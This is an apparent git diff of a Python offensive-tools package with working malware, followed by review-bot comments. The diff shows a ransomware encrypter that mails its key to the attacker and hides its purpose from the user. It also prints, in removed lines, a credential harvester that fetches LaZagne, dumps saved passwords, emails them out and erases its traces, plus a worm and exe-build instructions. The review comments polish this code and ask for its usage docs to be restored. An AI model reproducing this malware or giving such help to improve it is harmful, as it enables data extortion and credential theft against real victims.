RNSMWARE ATTK has been initialized on {environ.get("COMPUTERNAME", None)}\n**KEY** {str(self.KEY, encoding="utf-8")}\n**OS** {environ.get("OS", None)}\n\n' # report KEY to the attacker using email - if gmail!=None and passwd!=None and self.send_mail(mail=gmail, password=passwd): + if email != None and passwd != None and send_mail(email=email, password=passwd, receiver_mail=email, smtp_server=smtp_server, smtp_port=smtp_port): pass else: # print error message and exit if key is not sent 
@@ -26,23 +27,6 @@ def __init__(self, paths:list=None, gmail:str=None, passwd:str=None) -> None: else: self.PATHS = paths - - def send_mail(self, mail, password)->bool: - ''' - sends mail to specific address/addresses. - ''' - try: - message = f'Subject: RNSMWARE ATTK has been initialized on {environ["COMPUTERNAME"]}\n**KEY** {str(self.KEY, encoding="utf-8")}\n**OS** {environ["OS"]}\n\n' - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, mail, message) - server.quit() - return True - except Exception as e: - return False - - def __get_partitions_path(self) -> list: ''' returns all mounted partition's mount points as a list @@ -52,7 +36,6 @@ def __get_partitions_path(self) -> list: mount_points.append(partition.mountpoint) return mount_points - def encrypt_file(self, file_path): try: # read file data @@ -69,28 +52,13 @@ def encrypt_file(self, file_path): except Exception: return False - - - def encrypt_files(self, path:str): + + def encrypt_files(self, path: str): for root, dirs, files in walk(path): for file in files: file_path = join(root, file) self.encrypt_file(file_path=file_path) - def start(self): for path in self.PATHS: self.encrypt_files(path) - - -if __name__ == '__main__': - # Print some meaningful text, so that user don't suspect program as ransomeware - print('[*] Loading...') - - # Specify paths to be encrypted - PATHS = [r'path_to_be_encrypted',] - - # don't pass PATHS if all the drives are to be encrypted - encrypter = DMSECEncrypter(PATHS, gmail='yourgmailid', passwd='yourapppassword') - encrypter.start() - print('[*] Completed') diff --git a/pyhtools/malwares/wireless_password_harvester/__init__.py b/pyhtools/evil_files/worms/__init__.py similarity index 100% rename from pyhtools/malwares/wireless_password_harvester/__init__.py rename to pyhtools/evil_files/worms/__init__.py 
diff --git a/pyhtools/worms/dir_cloner.py b/pyhtools/evil_files/worms/dir_cloner.py similarity index 89% rename from pyhtools/worms/dir_cloner.py rename to pyhtools/evil_files/worms/dir_cloner.py index f791ed0..8952daf 100644 --- a/pyhtools/worms/dir_cloner.py +++ b/pyhtools/evil_files/worms/dir_cloner.py @@ -134,21 +134,4 @@ def clone_dir(self, times:int=1000, start_after:int=0, src:str=None, dst:str=Non time.sleep(start_after) for iteration in range(times): threading.Thread(target=self.clone, args=(iteration, src, dst)).start() - - -if __name__=='__main__': - dir_worm = DirCloner() - path = dir_worm.get_curr_drive_folder() - - if dir_worm.set_clone_path(path): - # print(f"[*] Clone path : {path}") - pass - else: - # print(f"[!] Failed to set new clone path {path}") - pass - - # for specific folder - dir_worm.clone_dir(times=1, start_after=0) - - # for specific folder and its subfolder - dir_worm.clone_all_dirs(times=1, start_after=0, path=path) \ No newline at end of file + \ No newline at end of file diff --git a/pyhtools/executable_generator/generator.py b/pyhtools/executable_generator/generator.py new file mode 100644 index 0000000..b2a31c2 --- /dev/null +++ b/pyhtools/executable_generator/generator.py 
@@ -0,0 +1,50 @@ +''' +module: generator.py +description: generates evil files using specified payload and type +''' +from enum import Enum +# from subprocess import check_call, check_output + + +# TODO: convert all evil files modules into classes +# create new class object with parameters and generate +# evil file using specified compiler using subprocess + + +class CompileOptions(Enum): + PYINTALLER = 0 + NUITKA = 1 + + +class Generator: + def __init__(self, _type: str, payload: str, compiler: CompileOptions = CompileOptions.PYINTALLER, *args, **kwargs) -> None: + self.__type = _type + self.__payload = payload + self.__compiler = compiler + + self.__options = { + 'malwares': [ + 'credential_harvester', + 'keylogger', + 'http_reverse_backdoor', + 'tcp_reverse_backdoor', + 'telegram_data_harvester', + 'telegram_remote_code_executor', + 'wireless_password_harvester' + ], + 'ransomwares': [ + 'dmsec', + ], + 'worms': [ + 'dir_cloner' + ], + } + + def verify(): + pass + + def show_options(): + pass + + def generate_file(): + pass diff --git a/pyhtools/executable_generator/utils.py b/pyhtools/executable_generator/utils.py deleted file mode 100644 index e060667..0000000 --- a/pyhtools/executable_generator/utils.py +++ /dev/null @@ -1,2 +0,0 @@ -from pyhtools.UI.colors import * - diff --git a/pyhtools/malwares/credential_harvester/credential_harvester.py b/pyhtools/malwares/credential_harvester/credential_harvester.py deleted file mode 100644 index cf63495..0000000 --- a/pyhtools/malwares/credential_harvester/credential_harvester.py +++ /dev/null 
@@ -1,72 +0,0 @@ -#!usr/bin/env python -import smtplib, requests, os, tempfile, subprocess, zipfile -import malwares.send_mail.send_mail as mail - -def send_mail(mail, password, message)->bool: - ''' - description: sends mail to self using gmail smtp. - params: mail, password, message - returns: bool - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, mail, message) - server.quit() - return True - except smtplib.SMTPException as e: - print('[-] Exception : ', e) - return False - - -def download(url:str)->bool: - ''' - description: downloads file from the url. - params: url - returns: bool - ''' - try: - response = requests.get(url) - file_name = url.split('/')[-1] - with open(file_name, 'wb') as dfile: - dfile.write(response.content) - return True - except Exception as e: - print('[-] Exception : ', e) - return False - - -def run(email, password): - ''' - starts collecting data and report to specified email. - ''' - tmp_dir = tempfile.gettempdir() - os.chdir(tmp_dir) - # download LaZagne - download(r'https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip') - with zipfile.ZipFile('Windows.zip', 'r') as zip_file: - zip_file.extractall(tmp_dir) - - os.chdir('Windows') - recovered_report = subprocess.call('laZagne_x86.exe all') - print(recovered_report) - - report = subprocess.check_output('lazagne.exe all -vv') - msg = 'Subject: Credential Harvester Report.\n' + report - mail.send_mail_to(email, email, password, msg) - - # remove traces - cwd = os.getcwd() - for file in os.listdir(cwd): - file_dir = os.path.join(cwd,file) - os.remove(file_dir) - - os.chdir('..') - os.rmdir('Windows') - os.remove('Windows.zip') - - -if __name__ == '__main__': - run('youremail@gmail.com', 'yourpassword') - \ No newline at end of file diff --git a/pyhtools/malwares/downloader/downloader.py b/pyhtools/malwares/downloader/downloader.py deleted file mode 100644 index f1f29b2..0000000 
--- a/pyhtools/malwares/downloader/downloader.py +++ /dev/null @@ -1,18 +0,0 @@ -import requests - -def download(url:str)->bool: - ''' - description: download and save file from the url. - params: url - returns: bool - ''' - try: - response = requests.get(url) - file_name = url.split('/')[-1] - with open(file_name, 'wb') as file: - file.write(response.content) - return True - - except Exception as e: - print('[-] Exception : ', e) - return False diff --git a/pyhtools/malwares/send_mail/how to.txt b/pyhtools/malwares/send_mail/how to.txt deleted file mode 100644 index 801d5d9..0000000 --- a/pyhtools/malwares/send_mail/how to.txt +++ /dev/null @@ -1,6 +0,0 @@ -refer this video tutorial: https://www.youtube.com/watch?v=ql5Dex4m40w - -Steps: -1. Turn on 2FA -2. Go to GoogleAcc->Security->AppPassword->Custom -3. Copy generated key and use that as password \ No newline at end of file diff --git a/pyhtools/malwares/send_mail/send_mail.py b/pyhtools/malwares/send_mail/send_mail.py deleted file mode 100644 index ea6915f..0000000 --- a/pyhtools/malwares/send_mail/send_mail.py +++ /dev/null @@ -1,33 +0,0 @@ -import smtplib - - -def send_mail_to(mail, receiver_mail: str , password, message)->bool: - ''' - sends mail to specific address/addresses. - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, receiver_mail, message) - server.quit() - return True - except smtplib.SMTPException as e: - print('[-] Exception : ', e) - return False - - -if __name__=='__main__': - msg = '''Subject: This is a test mail - Dear User, - This is a test message. - ''' - gmail = 'your@gmail.com' - password = 'password' - receivers = 'list of emails' - - # mail to self - send_mail_to(gmail, gmail, password, msg) - - # mail to others - send_mail_to(gmail, receivers, password, msg) 
diff --git a/pyhtools/malwares/wireless_password_harvester/HowToUse.txt b/pyhtools/malwares/wireless_password_harvester/HowToUse.txt deleted file mode 100644 index aecc52f..0000000 --- a/pyhtools/malwares/wireless_password_harvester/HowToUse.txt +++ /dev/null @@ -1,4 +0,0 @@ -HOW to use: -1. Update email id and password -2. Turn on less secure app: https://myaccount.google.com/lesssecureapps -3. Create exe: pyinstaller.exe --onefile --icon='icon_path' -n 'name_of_file' .\wireless_profile_harvestor.py \ No newline at end of file diff --git a/pyhtools/ransomwares/__init__.py b/pyhtools/ransomwares/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/pyhtools/ransomwares/dmsec/__init__.py b/pyhtools/ransomwares/dmsec/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/pyhtools/worms/__init__.py b/pyhtools/worms/__init__.py deleted file mode 100644 index e69de29..0000000
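Review bot: renaming the constructor parameter `port` to `smtp_port` in `WiFiPasswordHarvester.__init__` (first hunk of `wireless_password_harvester`) breaks any caller that passes `port=` by keyword; keep `port` as a deprecated alias for one release or call the rename out in the how-to, since no usage doc for this module survives the commit.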
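Review bot: in `start` (hunk `@@ -71,7 +55,7`) the shared helper is called with six positional arguments, `send_mail(self.email, self.email, self.passwd, credentials, self.smtp_server, self.smtp_port)`, while the encrypter hunk calls the same helper by keyword (`email=`, `password=`, `receiver_mail=`, `smtp_server=`, `smtp_port=`); use one convention, preferably keywords here too, so a reorder of the helper's parameters cannot silently swap sender and receiver, and document the helper's signature where it is defined.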
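Review bot: `if key == None` and `if type(key) == str` in `DMSecDecrypter.__init__` (hunk `@@ -4,15 +4,16`) should be `if key is None` and `isinstance(key, str)`; calling `exit()` from a constructor also terminates whatever imported the class, so raise `ValueError('missing key')` and let the caller decide.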
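Review bot: dropping the `if __name__ == '__main__':` block from `decrypter.py` (hunk `@@ -71,22 +68,6`) removes the only in-file example of how `KEY` and the optional `PATHS` list are supplied, while the adjacent `HowToUse.md` is carried over with 100% similarity, i.e. unchanged, even though the module and class names change in this same commit; update that document to `decrypter.py` / `DMSecDecrypter` or add a module docstring with the constructor arguments.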
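Review bot: `email != None and passwd != None` in `DMSecEncrypter.__init__` (hunk `@@ -1,17 +1,18`) should be `is not None` checks, and `environ.get("COMPUTERNAME", None)` already defaults to `None` so the second argument is redundant; the rename from `dmsec_ransomeware.py` / `DMSECEncrypter` to `encrypter.py` / `DMSecEncrypter` breaks existing imports and belongs in the same change as the matching `HowToUse.md` edit.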
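Review bot: the `dir_cloner.py` hunk replaces the removed `__main__` block with a single whitespace-only line and no trailing newline (`+ \ No newline at end of file`); delete that line and end the file with a newline after `threading.Thread(target=self.clone, args=(iteration, src, dst)).start()`, otherwise every later diff of this file carries the same noise.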
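Review bot: in the new `generator.py`, `CompileOptions.PYINTALLER` is misspelled (`PYINSTALLER`) and, as a new public enum member, gets harder to rename the longer it ships; `verify`, `show_options` and `generate_file` are defined without `self`, so calling them on a `Generator` instance raises `TypeError`; `__init__` accepts `*args, **kwargs` and silently discards them; and the hard-coded `__options` mapping duplicates the package layout under `evil_files/` and will drift from it. Fix the spelling, add `self`, and either drop the var-args or document what they are for before the stubs grow bodies.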
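Review bot: deleting `wireless_password_harvester/HowToUse.txt` removes the only build and configuration note for that module, and nothing in this diff replaces it; if the removal is intentional because the steps are stale (the referenced `lesssecureapps` setting is no longer offered by Google), add a one-line pointer to wherever the current instructions live.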